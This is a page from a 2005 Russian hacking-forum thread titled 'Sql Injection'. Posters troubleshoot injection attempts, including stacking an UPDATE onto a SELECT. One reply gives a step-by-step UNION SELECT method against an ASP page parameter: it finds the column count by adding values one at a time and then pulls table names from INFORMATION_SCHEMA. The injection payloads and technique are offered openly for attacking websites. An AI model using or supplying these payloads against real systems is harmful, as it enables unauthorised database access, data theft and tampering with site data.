Форум АНТИЧАТ
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   PHP, PERL, MySQL, JavaScript (https://forum.antichat.xyz/forumdisplay.php?f=37)
-   -   Sql Injection (https://forum.antichat.xyz/showthread.php?t=6374)

X-pl0id 04.05.2005 22:29
Sql Injection
 
Я не владею языком SQL по этому прошу помощи:

[SQL-query] LIMIT 1, UNION UPDATE [db_name] SET [x] = [y] WHERE [z] = 0/*

ругается на синтакс... Чё тут не так?

Algol 05.05.2005 11:47
А начало запроса какое ?

X-pl0id 05.05.2005 14:05
[I]SELECT m.[q], m.[w], m.[e], m.[r], m.[t], m.[y],m.[u], m., m.[a], m.[s], m.[d], me.[q],
me.[g], me.[f] FROM [db_name] m
LEFT JOIN [db_name2] me ON me.[z]=m.[z]
LEFT JOIN [db_name3] g ON m.[x]=g.[z] WHERE m.[z] > 0 AND m.[x]='1' AND g.[c] <> 1
ORDER BY m.[q] asc LIMIT 1, UNION UPDATE [db_name] SET [x] = [y] WHERE [z] = 0/*

X-pl0id 06.05.2005 16:42
Я тут покапался и разобрался что UNION мне совсем не нужен... такой запрос спокойно выполняется в phpMyAdmin: [I]SELECT m.[q], m.[w], m.[e], m.[r], m.[t], m.[y],m.[u], m., m.[a], m.[s], m.[d], me.[q],
me.[g], me.[f] FROM [db_name] m
LEFT JOIN [db_name2] me ON me.[z]=m.[z]
LEFT JOIN [db_name3] g ON m.[x]=g.[z] WHERE m.[z] > 0 AND m.[x]='1' AND g.[c] <> 1
ORDER BY m.[q] asc LIMIT 1,30 ; UPDATE [db_name] SET [x] = [y] WHERE [z] = 0/*

проблема в том что если этот запрос посылать через пхп, ну всмысле mysql_query("запрос") он все равно ругается на синтаксис в выделенном месте...

В чем там ошибка?

Algol 06.05.2005 21:08
Подробно приведи текст ругательства

X-pl0id 07.05.2005 09:18
mySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '; UPDATE [db_name] SET [db_name] WHERE [z] = 0/*,30' at line 8

KEZ 07.05.2005 14:03
Вообщето вместо [z], [x], и других выражений в кавычках нужно подставить реальные значения...

adler 07.05.2005 15:40
хм а у меня такая проблема:

/topics.asp?topID=19 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

вместо ошибки с названием первой таблицы возвращает:

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

Ктонибудь знает как с этим бороться?

Morph 08.05.2005 06:34
Товарищи это уже не по ФОрумам.

Trinux 08.05.2005 15:06
Цитата:
Сообщение от adler
хм а у меня такая проблема:

/topics.asp?topID=19 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

вместо ошибки с названием первой таблицы возвращает:

All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

Ктонибудь знает как с этим бороться?
SQL (в дамнном случае как я понял MS) говорит о том что в 2-х селектах между UNION разное количество полей достоваемых, а должно быть одинаковое. На число первых тыповлиять не можешь. а вот на число второго SELECT`а можешь. Делаешь:

/topics.asp?topID=19 UNION SELECT 1 FROM INFORMATION_SCHEMA.TABLES--
потом
/topics.asp?topID=19 UNION SELECT 1,2 FROM INFORMATION_SCHEMA.TABLES--
потом
/topics.asp?topID=19 UNION SELECT 1,2,3 FROM INFORMATION_SCHEMA.TABLES--
потом
/topics.asp?topID=19 UNION SELECT 1,2,3,4 FROM INFORMATION_SCHEMA.TABLES--

и так далее, пока не получишь результата. Как увидешь цифарки на экране подставляй в запрос вместо них поля, которые хочешь видеть. И все.


Время: 19:11
Страница 1 из 2 1 2 >
Показывать 40 сообщений этой темы на одной странице